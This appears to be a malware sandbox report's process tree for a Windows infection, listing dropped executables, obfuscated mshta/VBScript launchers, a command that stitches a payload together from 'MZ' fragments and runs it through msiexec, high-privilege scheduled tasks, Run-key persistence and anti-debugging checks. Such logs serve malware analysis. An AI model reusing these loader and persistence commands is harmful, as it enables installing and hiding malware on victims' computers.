C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:28⤵PID:12720
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=3760 /prefetch:88⤵PID:13332
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=1776 /prefetch:88⤵PID:13404
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=840 /prefetch:88⤵PID:14080
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2276 /prefetch:88⤵PID:14888
-
C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6324 -
C:\Users\Admin\Pictures\Adobe Films\0COn9mQq2c06dY1_MSTZTeAr.exe"C:\Users\Admin\Pictures\Adobe Films\0COn9mQq2c06dY1_MSTZTeAr.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4044 -
C:\Users\Admin\Pictures\Adobe Films\kFymlZ9bOtriLI_9SMXatxO1.exe"C:\Users\Admin\Pictures\Adobe Films\kFymlZ9bOtriLI_9SMXatxO1.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4252 -
C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3440 -
C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3832 -
C:\Users\Admin\Pictures\Adobe Films\xjdvs1LgMYNI2r3DKw2G3P7q.exe"C:\Users\Admin\Pictures\Adobe Films\xjdvs1LgMYNI2r3DKw2G3P7q.exe"5⤵
- Executes dropped EXE
PID:1652 -
C:\Users\Admin\Documents\87FzARwIAtus5eRStKnoTUrM.exe"C:\Users\Admin\Documents\87FzARwIAtus5eRStKnoTUrM.exe"6⤵PID:1844
-
C:\Users\Admin\Pictures\Adobe Films\lFrV0H5WFY4rYVRYwcn82CIk.exe"C:\Users\Admin\Pictures\Adobe Films\lFrV0H5WFY4rYVRYwcn82CIk.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4272 -
C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"7⤵PID:2844
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:8168
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:5400
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "vmxG6y17agDXIFl0WrvIMGYj.exe"10⤵
- Kills process with taskkill
PID:7556 -
C:\Users\Admin\Pictures\Adobe Films\Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe"C:\Users\Admin\Pictures\Adobe Films\Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe" /mixtwo7⤵PID:7256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8120 -
C:\Users\Admin\Pictures\Adobe Films\B4y_EASV2PYiiQ2KLAuWbSfl.exe"C:\Users\Admin\Pictures\Adobe Films\B4y_EASV2PYiiQ2KLAuWbSfl.exe"7⤵PID:7248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8040 -
C:\Users\Admin\Pictures\Adobe Films\vpV9faJ2l3iuMS1S0EcvzKDT.exe"C:\Users\Admin\Pictures\Adobe Films\vpV9faJ2l3iuMS1S0EcvzKDT.exe"7⤵PID:7320
-
C:\Users\Admin\Pictures\Adobe Films\4kgYjrUwfZuIqD6jgxXFJvig.exe"C:\Users\Admin\Pictures\Adobe Films\4kgYjrUwfZuIqD6jgxXFJvig.exe"7⤵PID:7448
-
C:\Users\Admin\Pictures\Adobe Films\ZM2sQl0eWse_3_2e51qEoUc8.exe"C:\Users\Admin\Pictures\Adobe Films\ZM2sQl0eWse_3_2e51qEoUc8.exe"7⤵
- Loads dropped DLL
PID:7112 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4264 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵PID:10732
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee010⤵PID:12512
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1688,14005092575502944277,10918929220183409607,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10732_962923810" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1704 /prefetch:210⤵PID:12860
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,14005092575502944277,10918929220183409607,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10732_962923810" --mojo-platform-channel-handle=1752 /prefetch:810⤵PID:12904
-
C:\Users\Admin\Pictures\Adobe Films\uzfSFO5ZcWEZJuaosWK2DY1z.exe"C:\Users\Admin\Pictures\Adobe Films\uzfSFO5ZcWEZJuaosWK2DY1z.exe"7⤵PID:8000
-
C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"C:\Users\Admin\Pictures\Adobe Films\Gy4Fi8em_KLp3z6GEiMCww2A.exe"7⤵PID:7760
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:1284 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:2996 -
C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"C:\Users\Admin\Pictures\Adobe Films\vZtRm6RPNwcqvnanVev4uQep.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6008 -
C:\Users\Admin\Pictures\Adobe Films\lDYn6p91yzfKElN48ASYj3I8.exe"C:\Users\Admin\Pictures\Adobe Films\lDYn6p91yzfKElN48ASYj3I8.exe"5⤵
- Executes dropped EXE
PID:5740 -
C:\Users\Admin\Pictures\Adobe Films\ik4j_W_ltwNfFlsIyokyL3WC.exe"C:\Users\Admin\Pictures\Adobe Films\ik4j_W_ltwNfFlsIyokyL3WC.exe"5⤵
- Executes dropped EXE
PID:5644 -
C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe"C:\Users\Admin\Pictures\Adobe Films\lDmYLXyNa7LPLO_m9F0WRNSp.exe"5⤵
- Executes dropped EXE
PID:3116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05851d7f13.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05851d7f13.exeFri05851d7f13.exe4⤵
- Executes dropped EXE
PID:2208 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0541e16ce794d258f.exe3⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri0541e16ce794d258f.exeFri0541e16ce794d258f.exe4⤵
- Executes dropped EXE
PID:3564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 2405⤵
- Program crash
PID:3844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05890d11cdb13f95e.exe3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05890d11cdb13f95e.exeFri05890d11cdb13f95e.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:5900 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5152 -
C:\ProgramData\4185474.exe"C:\ProgramData\4185474.exe"7⤵PID:6640
-
C:\ProgramData\5388765.exe"C:\ProgramData\5388765.exe"7⤵PID:6792
-
C:\ProgramData\1371155.exe"C:\ProgramData\1371155.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4156 -
C:\ProgramData\8884366.exe"C:\ProgramData\8884366.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1204 -
C:\ProgramData\1450546.exe"C:\ProgramData\1450546.exe"7⤵PID:4708
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"6⤵PID:5756
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e58bda179b647d8612e48a6ef749c3a3 wz+93ybZOUOarTGSQyPF/Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:2932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:4992
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:18408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3564 -ip 35641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3448
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5504 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2292 -ip 22921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5556 -ip 55561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5536 -ip 55361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4036 -ip 40361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5772 -ip 57721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 2561⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4980 -ip 49801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7056
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" ) do taskkill -im "%~NxK" -F1⤵PID:6644
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "mp7Vk_cGSKQF_a2Ibkt1jyyO.exe" -F2⤵
- Kills process with taskkill
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP2⤵PID:5776
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F4⤵PID:5928
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )3⤵PID:5000
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY4⤵PID:7488
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"5⤵PID:932
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "5⤵PID:7968
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY5⤵
- Loads dropped DLL
PID:4008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 2521⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7036
-
C:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A8E8.tmp\A8E9.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""1⤵PID:5008
-
C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"1⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\is-ETBRI.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-ETBRI.tmp\DYbALA.exe" /S /UID=27101⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:928 -
C:\Program Files\Windows Defender Advanced Threat Protection\AYZETYJXBB\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\AYZETYJXBB\foldershare.exe" /VERYSILENT2⤵PID:1420
-
C:\Users\Admin\AppData\Local\Temp\6e-43af4-f22-cbebd-84168f7b4ff61\Kakadaemaezhy.exe"C:\Users\Admin\AppData\Local\Temp\6e-43af4-f22-cbebd-84168f7b4ff61\Kakadaemaezhy.exe"2⤵PID:1092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e63⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcd08e46f8,0x7ffcd08e4708,0x7ffcd08e47184⤵PID:7164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:24⤵PID:16908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:34⤵PID:18980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:84⤵PID:19064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6780 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:14⤵PID:5812
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:84⤵PID:6196
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:84⤵PID:3112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:14⤵PID:4768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:14⤵PID:6564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:14⤵PID:8492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:14⤵PID:8728
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:14⤵PID:9320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1244753638332105109,11099420881660720801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:14⤵PID:9876
-
